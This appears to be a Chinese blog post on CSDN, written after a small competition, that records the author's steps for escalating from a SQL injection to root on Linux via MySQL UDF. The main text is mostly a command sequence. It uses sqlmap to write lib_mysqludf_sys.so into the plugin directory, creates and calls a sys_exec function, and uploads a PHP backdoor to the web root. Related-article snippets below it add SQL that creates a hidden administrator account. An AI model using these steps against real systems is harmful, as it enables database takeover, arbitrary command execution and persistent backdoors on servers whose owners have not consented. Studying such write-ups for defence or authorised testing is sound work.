Linux MySQL Udf 提权

最新推荐文章于 2024-04-01 21:11:18 发布
最新推荐文章于 2024-04-01 21:11:18 发布
阅读量2.1k 收藏 4
点赞数
分类专栏: 其他相关 逆向漏洞 web安全 文章标签: liuxn Udf提权 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/91515105
版权

在这里插入图片描述
前几天做一个小竞赛中有一个题目:给定的测试环境登录页面有POST注入漏洞,于是果断操起sqlmap跑数 据,无意中发现当前MySQL连接用户为root,于是想到udf提权「虽然Windows下MySQL提权基本上没问题,但是Linux环境下原来一直 没成功过。」,最终成功获取root权限「主要问题在于MySQL是以root权限运行」,记录笔记如下,方便以后查阅:
具体步骤如下

找到MySQL插件目录:

python sqlmap.py -u 'http://xxxx' --sql-shell

show variables like "%plugin%";

利用sqlmap上传 lib_mysqludf_sys到MySQL插件目录;

python sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so 
--file-dest=/usr/lib/mysql/plugin/

激活存储过程「sys_exec」函数:

python sqlmap.py -u 'http://xxxx' --sql-shell

CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so

SELECT * FROM information_schema.routines

sys_exec(id);

也利用sqlmap上传后门程序:

python sqlmap.py -u 'http://xxx'  --file-write=C:/phpspy.php --file-dest=/var/www/spy.php

测试环境

Linux Ubuntu 11.04 (Natty Narwhal)
PHP 5.3.5, Apache 2.2.17
MySQL 5.0

Coisini、
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux mysql udf
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 703
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
Linux利用UDF库实现Mysql
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql udf_mysql——udf
weixin_39958025的博客
12-05 142
01前言udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system限。02思路1.将udf文件上传到指定位置sqlmap中有现成的udf文件,有linux版本和windows版本分为32位和64位,...
渗透测试:数据库UDFlinux
最新发布
qq_63442530的博客
04-01 1290
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
mysql linux udf,mysql udf原理和案例分析 udf木马下载
weixin_32538033的博客
05-03 288
本文将详细讲述udf的原理及具体方法 您可以使用下面供的 langouster_udf.dll 专用网马(php)或者使用 php spider shell最新版(已去后门)--非常强大的PHP大马 里面的udf功能上传udf.php到目标站点访问 下面是udf马的界面进入之后.安装下面是这款udf.php马可以安装的function用法和说明一、功能:利用MYSQL的Cre...
linux mysql 渗透_Linux下的MySQL udf
weixin_34236986的博客
02-03 567
写在前面:本文旨在通过透彻分析LinuxMySQLudf高大家的知识水平,以对这种类型的进行更好的防范,学了不要干违法的事情,否则后果自负。Linux操作系统自从诞生后,其高效的处理能力和卓越的稳定性受到广大用户的亲睐,特别是服务器市场,Linux占有很大的份额。俗话说:树大招风。Linux在服务器领域的广泛应用使得Linux的安全也受到了前所未有的挑战。针对Linux的渗透与攻击...
mysql udf文件
02-01
mysql udf文件mysql udf文件
mysql-udf-http1.0附教程
05-16
本人亲自测试OK
mysql udf c文件
10-21
压缩包包含win32位/64位以及linux32位/64位的mysql udf 的c语言源码,自行编译
UDFlinux
m0_66299232的博客
05-23 1194
secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法。大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越操作。#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法。#secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可
MysqlUDF
yy
11-07 1万+
udf通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql限 —> 系统限。限制条件挺多,如下先获取mysql限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的限,即secure_file_priv的值为空。
Linuxmysql UDF
waxcj的博客
12-16 1961
linux mysql数据库
sqlmap mysql udf_Mysql-基于MysqlUDFLinux系统)
weixin_34696006的博客
01-30 750
基于MysqlUDF(Linux系统)【实验目的】??通过本实验理解如何通过webshell结合sqlmap自带的dll文件对Linux系统进行UDF,熟悉UDF的主要方法。【实验环境】攻击机:Kali-pri用户名college,密码360College目标靶机:CentOS-sqli-lab用户名college,密码360College【实验原理】??scp命令简介:??scp是...
Mysql udf(Linux平台)
热门推荐
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDFMySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行限 网上有些文章利用的是sqlmap-master\udf\mysq
linuxudf_udf
weixin_34862561的博客
01-14 982
0x00前言:udf是通过数据库来实现获取目标的管理员的shell,来达到从低到高限0x01什么是udfudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REA...
MySQL——udf
hackzkaq的博客
04-11 6362
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf的可能
MySQL--udf
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-09 150
udf = 'user defined function',即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充。如何获得udf文件将文件放到哪才能让mysql承认这个函数函数功能为什么这东西能(自定义函数指令是直接以管理员的限运行的SQL 注入且是高限secure_file_priv 无限制plugin 目录可写。
数据库--UDFMYSQL
qq_45936617的博客
10-07 293
数据库的目的是通过已有的数据库限获得操作系统的限。UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数。用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,通过添加命令执行函数可以执行系统命令, 从而进行
Mysql数据库
weixin_44023460的博客
07-12 1104
Root用户的密码还可能从网页脚本文件中获得,数据库连接直接使用root用户。分别在查询中输入脚本“select shell(‘cmd’,‘net user temp temp123456’)”、“select shell(‘cmd’,'net localgroup administrators temp /add ')”并执行该查询命令,如果执行成功,则表示在系统中添加“temp”用户,密码为“temp123456”,同时将该用户添加到管理员组中,使其具备管理员限,执行成功后如图5,图6所示。
mysql udf
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括是指通过某种方式获取更高限的操作。在MySQL中,如果你拥有一个低限的账户,但是想要执行高限操作,可以通过UDF来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低限账户调用该函数,从而实现操作。 需要注意的是,UDF需要满足以下条件: 1. 你需要有CREATE FUNCTION限,以创建和加载UDF函数。 2. 你需要找到一个合适的方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的方法适用于该版本和配置。 请注意,是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授的情况下进行。滥用功能可能导致系统被攻击或数据泄露等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值